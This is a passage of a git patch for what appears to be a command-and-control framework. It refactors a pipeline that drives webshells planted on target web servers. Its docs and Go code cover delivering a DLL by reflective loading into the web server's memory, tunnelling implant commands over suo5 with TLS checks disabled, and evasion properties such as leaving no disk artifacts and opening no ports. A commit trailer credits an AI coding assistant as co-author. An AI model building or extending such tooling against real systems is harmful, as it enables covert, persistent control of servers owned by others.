`suo5-webshell/suo5.php` | -| Webshell (JSP) | `suo5-webshell/suo5.jsp` | +| Webshell (ASPX) | `suo5-webshell/bridge.aspx` | +| Webshell (PHP) | `suo5-webshell/bridge.php` | +| Webshell (JSP) | `suo5-webshell/bridge.jsp` | From 3afd34ea50bae35ab693e7efb0c292e336c1480b Mon Sep 17 00:00:00 2001 From: M09Ic Date: Mon, 23 Mar 2026 10:56:54 +0800 Subject: [PATCH 19/19] refactor(pipeline): reuse MaleficParser, extract runtimeErrorHandler, simplify bootstrap - Replace custom writeFrame/readFrame with MaleficParser.WritePacket/ReadPacket, gaining built-in compression and optional Age encryption - Replace body envelope bootstrap protocol with simple HTTP query string (?s=stage) - Remove token/HMAC authentication (delegate to suo5 transport) - Extract PipelineRuntimeErrorHandler to core, deduplicate across all 5 pipelines (tcp, http, bind, rem, webshell) Co-Authored-By: Claude Opus 4.6 (1M context) --- docs/protocol/webshell-bridge.md | 73 ++++----- server/internal/core/pipeline.go | 47 ++++-- server/listener/bind.go | 18 +-- server/listener/http.go | 18 +-- server/listener/rem.go | 19 +-- server/listener/tcp.go | 18 +-- server/listener/webshell.go | 255 +++++++++---------------------- server/listener/webshell_test.go | 164 ++++++++------------ 8 files changed, 213 insertions(+), 399 deletions(-) diff --git a/docs/protocol/webshell-bridge.md b/docs/protocol/webshell-bridge.md index e1ffa17c..6ae4a163 100644 --- a/docs/protocol/webshell-bridge.md +++ b/docs/protocol/webshell-bridge.md @@ -27,20 +27,19 @@ Listener Process (WebShellPipeline) ──────────────────────────────────── Runs inside the listener, connects to Server via ListenerRPC (mTLS) - ┌─ Bootstrap (HTTP POST) ──────────────────────────────────┐ - │ Body envelope: [1B stage][4B sid LE][1B tok_len][tok][…] │ - │ Optional XOR obfuscation (key = sha256(token)[:16]) │ - │ OPSEC: no User-Agent, Content-Type mimics form POST │ + ┌─ Bootstrap (HTTP POST + query string) ───────────────────┐ + │ ?s=status / ?s=load / ?s=init / ?s=deps&name=... │ + │ Body = raw payload (DLL bytes, etc.) │ └──────────────────────────────────────────────────────────┘ ┌─ Data channel (suo5 full-duplex) ────────────────────────┐ │ proxyclient/suo5 → net.Conn │ - │ TLV frames: [0xd1][4B sid][4B len][spite bytes][0xd2] │ - │ Bidirectional streaming over persistent connection │ + │ Malefic wire format via MaleficParser (shared w/ TCP) │ + │ Compressed + optional Age encryption │ └──────────────────────────────────────────────────────────┘ ┌─ Forward integration ────────────────────────────────────┐ - │ SpiteStream ↔ TLV frame translation │ + │ SpiteStream ↔ MaleficParser read/write │ │ Session registration, checkin, task routing │ └──────────────────────────────────────────────────────────┘ @@ -50,7 +49,7 @@ Target Web Server Process WebShell (JSP/PHP/ASPX) - Bridge DLL loading (ReflectiveLoader) - Export resolution (bridge_init, bridge_process) - - TLV frames → call bridge_process() → return TLV response + - malefic frames → call bridge_process() → return malefic frame response - No port opened, no TCP loopback Bridge Runtime DLL (in web server process memory) @@ -71,11 +70,11 @@ Target Web Server Process Client exec("whoami") → Server (SpiteStream) → WebShellPipeline handler (receives SpiteRequest) - → writeFrame: TLV pack → suo5 conn + → MaleficParser.WritePacket → suo5 conn → WebShell (calls bridge_process via function pointer) → DLL module runtime → exec("whoami") → "root" - → TLV response via suo5 conn - → readLoop: TLV unpack → Forwarders.Send(SpiteResponse) + → malefic frame response via suo5 conn + → readLoop: MaleficParser.ReadPacket → Forwarders.Send(SpiteResponse) → Server → Client displays "root" ``` @@ -88,12 +87,12 @@ Deploy the suo5 webshell (JSP/PHP/ASPX) to the target web server. ### 2. Register and start the pipeline ``` -webshell new --listener my-listener --suo5 suo5://target/bridge.jsp --token SECRET --dll /path/to/bridge.dll +webshell new --listener my-listener --suo5 suo5://target/bridge.jsp --dll /path/to/bridge.dll ``` -The optional `--token` must match the `STAGE_TOKEN` constant in the webshell if set. Use the suo5 URL scheme (`suo5://` or `suo5s://` for HTTPS). +Use the suo5 URL scheme (`suo5://` or `suo5s://` for HTTPS). -The `--dll` flag enables auto-loading: when the pipeline starts, the bridge automatically delivers the DLL to the webshell if it is not already loaded. +The `--dll` flag enables auto-loading: when a session is initialized, the pipeline automatically delivers the DLL to the webshell if it is not already loaded. ### 3. Interact @@ -106,33 +105,35 @@ download /remote/file ## Protocol -### Bootstrap Envelope +### Bootstrap (HTTP POST) -Bootstrap requests use HTTP POST with `Content-Type: application/x-www-form-urlencoded` and no `User-Agent` header. The envelope is sent in plaintext; authentication is via the token field in the envelope header. +Bootstrap requests use simple HTTP POST with stage in query string. Authentication relies on suo5's own transport security. -**Envelope format (before optional XOR):** `[1B stage][4B sessionID LE][1B token_len][token bytes][payload...]` - -| Stage byte | Name | Payload | Response | -|-----------|------|---------|----------| -| `0x01` | load | Raw DLL bytes | `OK:memory` or error string | -| `0x02` | status | (empty) | JSON `{"ready":true,...}` or legacy `LOADED`/`NOT_LOADED` | -| `0x03` | init | (empty) | `[4B sessionID LE][Register protobuf]` | -| `0x06` | deps | `[1B dep_name_len][dep_name][file bytes]` | `OK:` or error string | +``` +POST /bridge.jsp?s=status HTTP/1.1 +POST /bridge.jsp?s=load HTTP/1.1 (body = raw DLL bytes) +POST /bridge.jsp?s=init HTTP/1.1 +POST /bridge.jsp?s=deps&name=.jna.jar HTTP/1.1 (body = file bytes) +``` -Token validation uses HMAC-SHA256 for secrets longer than 32 characters (rotates every 30s with +/-30s tolerance). Short secrets use static comparison. +| Stage | Payload | Response | +|-------|---------|----------| +| `status` | (empty) | JSON `{"ready":true,...}` or `LOADED`/`NOT_LOADED` | +| `load` | Raw DLL bytes | `OK:memory` or error string | +| `init` | (empty) | `[4B sessionID LE][Register protobuf]` | +| `deps` | File bytes (name in `?name=` param) | `OK:` or error string | -### Data Channel TLV Frame +### Data Channel (Malefic Wire Format) -After bootstrap, a persistent suo5 connection carries bidirectional TLV frames: +After bootstrap, a persistent suo5 connection carries bidirectional frames using the standard malefic wire format (reuses `MaleficParser`): ``` -[1B 0xd1][4B sessionID LE][4B payload_len LE][payload bytes][1B 0xd2] +[0xd1][4B sessionID LE][4B payload_len LE][compressed Spites protobuf][0xd2] ``` -- `0xd1` / `0xd2` are start/end delimiters matching malefic wire format -- Payload is serialized `Spites` protobuf -- Maximum frame size: 10 MiB -- Future: payload will be encrypted (outer streaming encryption layer) +- Identical to the malefic implant wire format — same delimiters, same header layout +- Payload is compressed (and optionally Age-encrypted via `WithSecure`) +- Parsed by `server/internal/parser/malefic/parser.go` (shared with TCP/HTTP pipelines) ### DLL Export Interface @@ -167,10 +168,9 @@ The DLL must also export `ReflectiveLoader` for the loading phase. The webshell | Property | Status | |----------|--------| | Custom HTTP headers | None — no X-*, no custom cookies | -| User-Agent | Empty (Go default stripped) | -| Content-Type | `application/x-www-form-urlencoded` (common POST type) | -| Bootstrap body | Plaintext envelope (token included for auth) | -| Data channel | TLV-framed, ready for encryption layer | +| Content-Type | `application/octet-stream` (bootstrap) | +| Authentication | Delegated to suo5 transport | +| Data channel | Malefic wire format with compression + optional Age encryption | | Ports opened | None on target | | Disk artifacts | None (DLL is memory-only) | @@ -180,6 +180,7 @@ The DLL must also export `ReflectiveLoader` for the loading phase. The webshell |---------|------| | WebShell pipeline | `server/listener/webshell.go` | | Pipeline tests | `server/listener/webshell_test.go` | +| Malefic parser (shared) | `server/internal/parser/malefic/parser.go` | | Client commands | `client/command/pipeline/webshell.go` | | Webshell (ASPX) | `suo5-webshell/bridge.aspx` | | Webshell (PHP) | `suo5-webshell/bridge.php` | diff --git a/server/internal/core/pipeline.go b/server/internal/core/pipeline.go index fc2f5cb8..71ad286b 100644 --- a/server/internal/core/pipeline.go +++ b/server/internal/core/pipeline.go @@ -2,9 +2,11 @@ package core import ( "errors" + "fmt" "io" "sync" + "github.com/chainreactors/IoM-go/consts" "github.com/chainreactors/IoM-go/proto/client/clientpb" "github.com/chainreactors/malice-network/helper/implanttypes" "github.com/chainreactors/malice-network/server/internal/configs" @@ -99,18 +101,33 @@ func (p *PipelineConfig) WrapBindConn(conn io.ReadWriteCloser) (*cryptostream.Co return cryptostream.WrapBindConn(conn, crys) } -// -//func (p *PipelineConfig) ToFile() *clientpb.Pipeline { -// return &clientpb.Pipeline{ -// Tls: &clientpb.TLS{ -// TLSConfig: p.TlsConfig.TLSConfig, -// Key: p.TlsConfig.Key, -// Enable: p.TlsConfig.Enable, -// }, -// Encryption: &clientpb.Encryption{ -// Enable: p.Encryption.Enable, -// Type: p.Encryption.Type, -// Key: p.Encryption.Key, -// }, -// } -//} +// PipelineRuntimeErrorHandler builds a standard error handler for pipeline +// runtime goroutines. All pipeline types (tcp, http, bind, rem, webshell) share +// the same pattern: log the error, disable the pipeline, optionally run cleanup, +// and publish an event. +func PipelineRuntimeErrorHandler(typeName, pipelineName, listenerID string, disabler func(), cleanup func(), op ...string) GoErrorHandler { + label := fmt.Sprintf("%s pipeline %s", typeName, pipelineName) + ctrlOp := consts.CtrlPipelineStop + if len(op) > 0 { + ctrlOp = op[0] + } + return CombineErrorHandlers( + LogGuardedError(label), + func(err error) { + disabler() + if cleanup != nil { + cleanup() + } + if EventBroker != nil { + EventBroker.Publish(Event{ + EventType: consts.EventListener, + Op: ctrlOp, + Listener: &clientpb.Listener{Id: listenerID}, + Message: label, + Err: ErrorText(err), + Important: true, + }) + } + }, + ) +} diff --git a/server/listener/bind.go b/server/listener/bind.go index f6bc1cbb..0f80979b 100644 --- a/server/listener/bind.go +++ b/server/listener/bind.go @@ -148,21 +148,5 @@ func (pipeline *BindPipeline) handlerReq(req *clientpb.SpiteRequest) error { } func (pipeline *BindPipeline) runtimeErrorHandler(scope string) core.GoErrorHandler { - label := fmt.Sprintf("bind pipeline %s %s", pipeline.Name, scope) - return core.CombineErrorHandlers( - core.LogGuardedError(label), - func(err error) { - pipeline.Enable = false - if core.EventBroker != nil { - core.EventBroker.Publish(core.Event{ - EventType: consts.EventListener, - Op: consts.CtrlPipelineStop, - Listener: &clientpb.Listener{Id: pipeline.ListenerID}, - Message: label, - Err: core.ErrorText(err), - Important: true, - }) - } - }, - ) + return core.PipelineRuntimeErrorHandler("bind", pipeline.Name+" "+scope, pipeline.ListenerID, func() { pipeline.Enable = false }, nil) } diff --git a/server/listener/http.go b/server/listener/http.go index 90ea3c04..9187b67d 100644 --- a/server/listener/http.go +++ b/server/listener/http.go @@ -345,24 +345,12 @@ func (pipeline *HTTPPipeline) writeError(w http.ResponseWriter, statusCode int, } func (pipeline *HTTPPipeline) runtimeErrorHandler(scope string) core.GoErrorHandler { - label := fmt.Sprintf("http pipeline %s %s", pipeline.Name, scope) - return core.CombineErrorHandlers( - core.LogGuardedError(label), - func(err error) { - pipeline.Enable = false + return core.PipelineRuntimeErrorHandler("http", pipeline.Name+" "+scope, pipeline.ListenerID, + func() { pipeline.Enable = false }, + func() { if pipeline.srv != nil { _ = pipeline.srv.Close() } - if core.EventBroker != nil { - core.EventBroker.Publish(core.Event{ - EventType: consts.EventListener, - Op: consts.CtrlPipelineStop, - Listener: &clientpb.Listener{Id: pipeline.ListenerID}, - Message: label, - Err: core.ErrorText(err), - Important: true, - }) - } }, ) } diff --git a/server/listener/rem.go b/server/listener/rem.go index 6982375d..95999655 100644 --- a/server/listener/rem.go +++ b/server/listener/rem.go @@ -264,25 +264,14 @@ func (rem *REM) healthLoop() error { } func (rem *REM) runtimeErrorHandler(scope string) core.GoErrorHandler { - label := fmt.Sprintf("rem pipeline %s %s", rem.Name, scope) - return core.CombineErrorHandlers( - core.LogGuardedError(label), - func(err error) { - rem.Enable = false + return core.PipelineRuntimeErrorHandler("rem", rem.Name+" "+scope, rem.ListenerID, + func() { rem.Enable = false }, + func() { if rem.con != nil { _ = rem.con.Close() } - if core.EventBroker != nil { - core.EventBroker.Publish(core.Event{ - EventType: consts.EventListener, - Op: consts.CtrlRemStop, - Listener: &clientpb.Listener{Id: rem.ListenerID}, - Message: label, - Err: core.ErrorText(err), - Important: true, - }) - } }, + consts.CtrlRemStop, ) } diff --git a/server/listener/tcp.go b/server/listener/tcp.go index 940a06b2..3d752b73 100644 --- a/server/listener/tcp.go +++ b/server/listener/tcp.go @@ -253,24 +253,12 @@ func (pipeline *TCPPipeline) handleBeacon(conn *cryptostream.Conn) { } func (pipeline *TCPPipeline) runtimeErrorHandler(scope string) core.GoErrorHandler { - label := fmt.Sprintf("tcp pipeline %s %s", pipeline.Name, scope) - return core.CombineErrorHandlers( - core.LogGuardedError(label), - func(err error) { - pipeline.Enable = false + return core.PipelineRuntimeErrorHandler("tcp", pipeline.Name+" "+scope, pipeline.ListenerID, + func() { pipeline.Enable = false }, + func() { if pipeline.ln != nil { _ = pipeline.ln.Close() } - if core.EventBroker != nil { - core.EventBroker.Publish(core.Event{ - EventType: consts.EventListener, - Op: consts.CtrlPipelineStop, - Listener: &clientpb.Listener{Id: pipeline.ListenerID}, - Message: label, - Err: core.ErrorText(err), - Important: true, - }) - } }, ) } diff --git a/server/listener/webshell.go b/server/listener/webshell.go index aecf41a1..b77a4ecd 100644 --- a/server/listener/webshell.go +++ b/server/listener/webshell.go @@ -2,11 +2,8 @@ package listener import ( "bytes" - "crypto/hmac" - "crypto/sha256" "crypto/tls" "encoding/binary" - "encoding/hex" "encoding/json" "fmt" "io" @@ -26,24 +23,17 @@ import ( "github.com/chainreactors/logs" "github.com/chainreactors/malice-network/helper/encoders/hash" "github.com/chainreactors/malice-network/server/internal/core" + "github.com/chainreactors/malice-network/server/internal/parser" "github.com/chainreactors/proxyclient/suo5" "google.golang.org/protobuf/proto" ) -// Stage codes for DLL bootstrap HTTP envelope. +// Bootstrap stage names for HTTP query string (?s=). const ( - wsStageLoad byte = 0x01 - wsStageStatus byte = 0x02 - wsStageInit byte = 0x03 - wsStageDeps byte = 0x06 -) - -// TLV delimiters matching malefic wire format. -const ( - tlvStart byte = 0xd1 - tlvEnd byte = 0xd2 - tlvHeaderLen = 9 // 1 (start) + 4 (sid) + 4 (len) - maxFrameSize uint32 = 10 * 1024 * 1024 + wsStageLoad = "load" + wsStageStatus = "status" + wsStageInit = "init" + wsStageDeps = "deps" ) // webshellParams is the JSON stored in CustomPipeline.Params. @@ -54,69 +44,6 @@ type webshellParams struct { DepsDir string `json:"deps_dir,omitempty"` } -// httpTransport wraps a shared http.Client with OPSEC-safe defaults. -type httpTransport struct { - client *http.Client - url string - token string -} - -func newHTTPTransport(suo5URL, token string, timeout time.Duration) *httpTransport { - return &httpTransport{ - client: &http.Client{ - Timeout: timeout, - Transport: &http.Transport{ - TLSClientConfig: &tls.Config{InsecureSkipVerify: true}, - }, - }, - url: suo5ToHTTPURL(suo5URL), - token: token, - } -} - -// do sends a body-envelope HTTP POST. -// Envelope: [1B stage][4B sid LE][1B token_len][token][payload] -// No XOR obfuscation — webshells (PHP/JSP/ASPX) parse the raw envelope directly. -func (t *httpTransport) do(stage byte, payload []byte, sid uint32) ([]byte, error) { - tok := computeBootstrapToken(t.token) - tokLen := len(tok) - if tokLen > 255 { - tokLen = 255 - tok = tok[:255] - } - - hdrLen := 6 + tokLen - buf := make([]byte, hdrLen+len(payload)) - buf[0] = stage - binary.LittleEndian.PutUint32(buf[1:5], sid) - buf[5] = byte(tokLen) - copy(buf[6:6+tokLen], tok) - copy(buf[hdrLen:], payload) - - req, err := http.NewRequest("POST", t.url, bytes.NewReader(buf)) - if err != nil { - return nil, err - } - // OPSEC: no fingerprinting headers. - req.Header.Set("User-Agent", "") - req.Header.Set("Content-Type", "application/x-www-form-urlencoded") - - resp, err := t.client.Do(req) - if err != nil { - return nil, err - } - defer resp.Body.Close() - - body, err := io.ReadAll(resp.Body) - if err != nil { - return nil, err - } - if resp.StatusCode != http.StatusOK { - return nil, fmt.Errorf("HTTP %d: %s", resp.StatusCode, string(body)) - } - return body, nil -} - func NewWebShellPipeline(rpc bindRPCClient, pipeline *clientpb.Pipeline) (*WebShellPipeline, error) { custom := pipeline.GetCustom() if custom == nil { @@ -136,17 +63,27 @@ func NewWebShellPipeline(rpc bindRPCClient, pipeline *clientpb.Pipeline) (*WebSh return nil, fmt.Errorf("webshell pipeline requires suo5_url") } + msgParser, err := parser.NewParser(consts.ImplantMalefic) + if err != nil { + return nil, fmt.Errorf("create malefic parser: %w", err) + } + return &WebShellPipeline{ rpc: rpc, Name: pipeline.Name, ListenerID: pipeline.ListenerId, Enable: pipeline.Enable, Suo5URL: params.Suo5URL, - StageToken: params.StageToken, DLLPath: params.DLLPath, DepsDir: params.DepsDir, - transport: newHTTPTransport(params.Suo5URL, params.StageToken, 30*time.Second), - pipeline: pipeline, + parser: msgParser, + httpClient: &http.Client{ + Timeout: 30 * time.Second, + Transport: &http.Transport{ + TLSClientConfig: &tls.Config{InsecureSkipVerify: true}, + }, + }, + pipeline: pipeline, }, nil } @@ -156,13 +93,13 @@ type WebShellPipeline struct { ListenerID string Enable bool Suo5URL string - StageToken string DLLPath string DepsDir string - transport *httpTransport - sessions sync.Map // rawID(uint32) → *webshellSession - pipeline *clientpb.Pipeline + parser *parser.MessageParser + httpClient *http.Client + sessions sync.Map // rawID(uint32) → *webshellSession + pipeline *clientpb.Pipeline } type webshellSession struct { @@ -235,7 +172,7 @@ func (p *WebShellPipeline) handlerReq(req *clientpb.SpiteRequest) error { spites := &implantpb.Spites{Spites: []*implantpb.Spite{req.Spite}} sess.mu.Lock() - err := writeFrame(sess.conn, spites, sess.rawID) + err := p.parser.WritePacket(sess.conn, spites, sess.rawID) sess.mu.Unlock() return err } @@ -290,7 +227,7 @@ func (p *WebShellPipeline) readLoop(sess *webshellSession, sessionID string) err logs.Log.Debugf("[webshell] readLoop exit for session %d", sess.rawID) }() for { - spites, err := readFrame(sess.conn) + _, spites, err := p.parser.ReadPacket(sess.conn) if err != nil { return fmt.Errorf("session %d read: %w", sess.rawID, err) } @@ -304,7 +241,7 @@ func (p *WebShellPipeline) readLoop(sess *webshellSession, sessionID string) err // bootstrapDLL performs status check, DLL load if needed, and init handshake. func (p *WebShellPipeline) bootstrapDLL() (*implantpb.Register, uint32, error) { - statusBody, err := p.transport.do(wsStageStatus, nil, 0) + statusBody, err := p.bootstrapHTTP(wsStageStatus, nil) if err != nil { return nil, 0, fmt.Errorf("status check: %w", err) } @@ -325,15 +262,15 @@ func (p *WebShellPipeline) bootstrapDLL() (*implantpb.Register, uint32, error) { if err != nil { return nil, 0, fmt.Errorf("read DLL %s: %w", p.DLLPath, err) } - if _, err = p.transport.do(wsStageLoad, dllBytes, 0); err != nil { + if _, err = p.bootstrapHTTP(wsStageLoad, dllBytes); err != nil { return nil, 0, fmt.Errorf("load DLL: %w", err) } - logs.Log.Infof("[webshell] DLL loaded to %s", p.transport.url) + logs.Log.Infof("[webshell] DLL loaded to %s", suo5ToHTTPURL(p.Suo5URL)) } else if !ready { return nil, 0, fmt.Errorf("DLL not loaded and no --dll path provided") } - body, err := p.transport.do(wsStageInit, nil, 0) + body, err := p.bootstrapHTTP(wsStageInit, nil) if err != nil { return nil, 0, fmt.Errorf("init: %w", err) } @@ -364,26 +301,56 @@ func (p *WebShellPipeline) deliverDeps() error { return fmt.Errorf("read dep %s: %w", entry.Name(), err) } depName := entry.Name() - if !strings.HasPrefix(depName, ".") { - depName = "." + depName + reqURL := fmt.Sprintf("%s?s=%s&name=%s", suo5ToHTTPURL(p.Suo5URL), wsStageDeps, url.QueryEscape(depName)) + req, err := http.NewRequest("POST", reqURL, bytes.NewReader(data)) + if err != nil { + return fmt.Errorf("create dep request %s: %w", depName, err) } - nameBytes := []byte(depName) - if len(nameBytes) > 255 { - nameBytes = nameBytes[:255] + req.Header.Set("Content-Type", "application/octet-stream") + resp, err := p.httpClient.Do(req) + if err != nil { + return fmt.Errorf("deliver dep %s: %w", depName, err) } - payload := make([]byte, 1+len(nameBytes)+len(data)) - payload[0] = byte(len(nameBytes)) - copy(payload[1:1+len(nameBytes)], nameBytes) - copy(payload[1+len(nameBytes):], data) - - if _, err = p.transport.do(wsStageDeps, payload, 0); err != nil { - return fmt.Errorf("deliver dep %s: %w", entry.Name(), err) + resp.Body.Close() + if resp.StatusCode != http.StatusOK { + return fmt.Errorf("deliver dep %s: HTTP %d", depName, resp.StatusCode) } - logs.Log.Debugf("[webshell] dep delivered: %s", entry.Name()) + logs.Log.Debugf("[webshell] dep delivered: %s", depName) } return nil } +// bootstrapHTTP sends a simple HTTP POST with stage in query string. +// ?s=status / ?s=load / ?s=init +func (p *WebShellPipeline) bootstrapHTTP(stage string, payload []byte) ([]byte, error) { + reqURL := fmt.Sprintf("%s?s=%s", suo5ToHTTPURL(p.Suo5URL), stage) + + var bodyReader io.Reader + if payload != nil { + bodyReader = bytes.NewReader(payload) + } + req, err := http.NewRequest("POST", reqURL, bodyReader) + if err != nil { + return nil, err + } + req.Header.Set("Content-Type", "application/octet-stream") + + resp, err := p.httpClient.Do(req) + if err != nil { + return nil, err + } + defer resp.Body.Close() + + body, err := io.ReadAll(resp.Body) + if err != nil { + return nil, err + } + if resp.StatusCode != http.StatusOK { + return nil, fmt.Errorf("HTTP %d: %s", resp.StatusCode, string(body)) + } + return body, nil +} + func (p *WebShellPipeline) dialSuo5() (net.Conn, error) { u, err := url.Parse(p.Suo5URL) if err != nil { @@ -393,9 +360,6 @@ func (p *WebShellPipeline) dialSuo5() (net.Conn, error) { if err != nil { return nil, fmt.Errorf("suo5 config: %w", err) } - if string(conf.Mode) == "half" { - return nil, fmt.Errorf("suo5 detected half-duplex mode; webshell bridge requires full-duplex (target may be behind a buffering reverse proxy)") - } client := &suo5.Suo5Client{Proxy: u, Conf: conf} conn, err := client.Dial("tcp", "bridge:0") if err != nil { @@ -405,84 +369,11 @@ func (p *WebShellPipeline) dialSuo5() (net.Conn, error) { } func (p *WebShellPipeline) runtimeErrorHandler(scope string) core.GoErrorHandler { - label := fmt.Sprintf("webshell pipeline %s %s", p.Name, scope) - return core.CombineErrorHandlers( - core.LogGuardedError(label), - func(err error) { - p.Enable = false - if core.EventBroker != nil { - core.EventBroker.Publish(core.Event{ - EventType: consts.EventListener, - Op: consts.CtrlPipelineStop, - Listener: &clientpb.Listener{Id: p.ListenerID}, - Message: label, - Err: core.ErrorText(err), - Important: true, - }) - } - }, - ) -} - -// --- TLV frame protocol: [0xd1][4B sid LE][4B len LE][data][0xd2] --- - -func writeFrame(conn net.Conn, spites *implantpb.Spites, sid uint32) error { - data, err := proto.Marshal(spites) - if err != nil { - return err - } - buf := make([]byte, tlvHeaderLen+len(data)+1) - buf[0] = tlvStart - binary.LittleEndian.PutUint32(buf[1:5], sid) - binary.LittleEndian.PutUint32(buf[5:9], uint32(len(data))) - copy(buf[tlvHeaderLen:], data) - buf[len(buf)-1] = tlvEnd - _, err = conn.Write(buf) - return err -} - -func readFrame(conn net.Conn) (*implantpb.Spites, error) { - var hdr [tlvHeaderLen]byte - if _, err := io.ReadFull(conn, hdr[:]); err != nil { - return nil, err - } - if hdr[0] != tlvStart { - return nil, fmt.Errorf("invalid TLV start: 0x%02x", hdr[0]) - } - length := binary.LittleEndian.Uint32(hdr[5:9]) - if length > maxFrameSize { - return nil, fmt.Errorf("frame too large: %d bytes", length) - } - // +1 for end delimiter - payload := make([]byte, length+1) - if _, err := io.ReadFull(conn, payload); err != nil { - return nil, err - } - if payload[length] != tlvEnd { - return nil, fmt.Errorf("invalid TLV end: 0x%02x", payload[length]) - } - spites := &implantpb.Spites{} - if err := proto.Unmarshal(payload[:length], spites); err != nil { - return nil, err - } - return spites, nil + return core.PipelineRuntimeErrorHandler("webshell", p.Name+" "+scope, p.ListenerID, func() { p.Enable = false }, nil) } // --- Helpers --- -func computeBootstrapToken(secret string) string { - if secret == "" { - return "" - } - if len(secret) <= 32 { - return secret - } - window := time.Now().Unix() / 30 - mac := hmac.New(sha256.New, []byte(secret)) - _ = binary.Write(mac, binary.BigEndian, window) - return hex.EncodeToString(mac.Sum(nil)) -} - func suo5ToHTTPURL(suo5URL string) string { s := strings.TrimSpace(suo5URL) s = strings.Replace(s, "suo5s://", "https://", 1) diff --git a/server/listener/webshell_test.go b/server/listener/webshell_test.go index 2492d212..7d891b66 100644 --- a/server/listener/webshell_test.go +++ b/server/listener/webshell_test.go @@ -1,42 +1,50 @@ package listener import ( - "encoding/binary" - "io" "net" "net/http" "net/http/httptest" "testing" - "time" + "github.com/chainreactors/IoM-go/consts" + "github.com/chainreactors/IoM-go/proto/client/clientpb" "github.com/chainreactors/IoM-go/proto/implant/implantpb" - "google.golang.org/protobuf/proto" + "github.com/chainreactors/malice-network/server/internal/parser" ) -func TestWriteReadFrameTLV(t *testing.T) { +func TestMaleficParserRoundtrip(t *testing.T) { server, client := net.Pipe() defer server.Close() defer client.Close() + p, err := parser.NewParser(consts.ImplantMalefic) + if err != nil { + t.Fatalf("NewParser: %v", err) + } + want := &implantpb.Spites{ Spites: []*implantpb.Spite{ {Name: "test_cmd", TaskId: 42}, }, } + var sid uint32 = 1234 errCh := make(chan error, 1) go func() { - errCh <- writeFrame(server, want, 1234) + errCh <- p.WritePacket(server, want, sid) }() - got, err := readFrame(client) + gotSid, got, err := p.ReadPacket(client) if err != nil { - t.Fatalf("readFrame: %v", err) + t.Fatalf("ReadPacket: %v", err) } if writeErr := <-errCh; writeErr != nil { - t.Fatalf("writeFrame: %v", writeErr) + t.Fatalf("WritePacket: %v", writeErr) } + if gotSid != sid { + t.Fatalf("sid = %d, want %d", gotSid, sid) + } if len(got.Spites) != 1 { t.Fatalf("spite count = %d, want 1", len(got.Spites)) } @@ -48,61 +56,20 @@ func TestWriteReadFrameTLV(t *testing.T) { } } -func TestWriteFrameTLVWireFormat(t *testing.T) { +func TestMaleficParserInvalidStart(t *testing.T) { server, client := net.Pipe() defer server.Close() defer client.Close() - spites := &implantpb.Spites{ - Spites: []*implantpb.Spite{{Name: "ping"}}, - } - var sid uint32 = 0xDEAD - - go writeFrame(server, spites, sid) - - // Read raw bytes to verify TLV wire format. - var hdr [tlvHeaderLen]byte - if _, err := io.ReadFull(client, hdr[:]); err != nil { - t.Fatalf("read header: %v", err) - } - - if hdr[0] != tlvStart { - t.Fatalf("start delimiter = 0x%02x, want 0x%02x", hdr[0], tlvStart) - } - gotSid := binary.LittleEndian.Uint32(hdr[1:5]) - if gotSid != sid { - t.Fatalf("sid = %d, want %d", gotSid, sid) - } - - dataLen := binary.LittleEndian.Uint32(hdr[5:9]) - data, _ := proto.Marshal(spites) - if dataLen != uint32(len(data)) { - t.Fatalf("frame length = %d, want %d", dataLen, len(data)) - } - - // Read payload + end delimiter. - payload := make([]byte, dataLen+1) - if _, err := io.ReadFull(client, payload); err != nil { - t.Fatalf("read payload: %v", err) - } - if payload[dataLen] != tlvEnd { - t.Fatalf("end delimiter = 0x%02x, want 0x%02x", payload[dataLen], tlvEnd) - } -} - -func TestReadFrameInvalidStart(t *testing.T) { - server, client := net.Pipe() - defer server.Close() - defer client.Close() + p, _ := parser.NewParser(consts.ImplantMalefic) go func() { - // Write garbage header. - buf := make([]byte, tlvHeaderLen) - buf[0] = 0xFF + buf := make([]byte, 9) + buf[0] = 0xFF // invalid start delimiter server.Write(buf) }() - _, err := readFrame(client) + _, _, err := p.ReadPacket(client) if err == nil { t.Fatal("expected error for invalid start delimiter") } @@ -125,19 +92,6 @@ func TestSuo5ToHTTPURL(t *testing.T) { } } -func TestComputeBootstrapToken(t *testing.T) { - if got := computeBootstrapToken(""); got != "" { - t.Fatalf("empty secret = %q, want empty", got) - } - if got := computeBootstrapToken("short"); got != "short" { - t.Fatalf("short secret = %q, want %q", got, "short") - } - got := computeBootstrapToken("this-is-a-very-long-secret-that-exceeds-32-characters") - if len(got) != 64 { - t.Fatalf("HMAC token length = %d, want 64", len(got)) - } -} - func TestNewWebShellPipelineMissingParams(t *testing.T) { _, err := NewWebShellPipeline(nil, nil) if err == nil { @@ -145,57 +99,59 @@ func TestNewWebShellPipelineMissingParams(t *testing.T) { } } -func TestHTTPTransportOPSECHeaders(t *testing.T) { - var gotUA, gotCT string - ts := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { - gotUA = r.Header.Get("User-Agent") - gotCT = r.Header.Get("Content-Type") - w.WriteHeader(http.StatusOK) - w.Write([]byte("OK")) - })) - defer ts.Close() - - transport := &httpTransport{ - client: ts.Client(), - url: ts.URL, - token: "", +func TestNewWebShellPipelineValidParams(t *testing.T) { + pipeline := &clientpb.Pipeline{ + Name: "ws1", + ListenerId: "listener-a", + Enable: true, + Type: "webshell", + Body: &clientpb.Pipeline_Custom{ + Custom: &clientpb.CustomPipeline{ + Name: "ws1", + Params: `{"suo5_url":"suo5://target/bridge.php","dll_path":"/tmp/bridge.dll"}`, + }, + }, } - _, err := transport.do(wsStageStatus, nil, 0) + p, err := NewWebShellPipeline(nil, pipeline) if err != nil { - t.Fatalf("transport.do: %v", err) + t.Fatalf("NewWebShellPipeline: %v", err) } - - if gotUA != "" { - t.Errorf("User-Agent = %q, want empty", gotUA) + if p.Suo5URL != "suo5://target/bridge.php" { + t.Fatalf("Suo5URL = %q, want %q", p.Suo5URL, "suo5://target/bridge.php") } - if gotCT != "application/x-www-form-urlencoded" { - t.Errorf("Content-Type = %q, want application/x-www-form-urlencoded", gotCT) + if p.parser == nil { + t.Fatal("parser should not be nil") } } -func TestHTTPTransportPlaintextEnvelope(t *testing.T) { - token := "my-secret-token" - var receivedBody []byte - +func TestBootstrapHTTPQueryString(t *testing.T) { + var gotStage, gotCT string ts := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { - receivedBody, _ = io.ReadAll(r.Body) + gotStage = r.URL.Query().Get("s") + gotCT = r.Header.Get("Content-Type") w.WriteHeader(http.StatusOK) - w.Write([]byte("OK")) + w.Write([]byte("LOADED")) })) defer ts.Close() - transport := 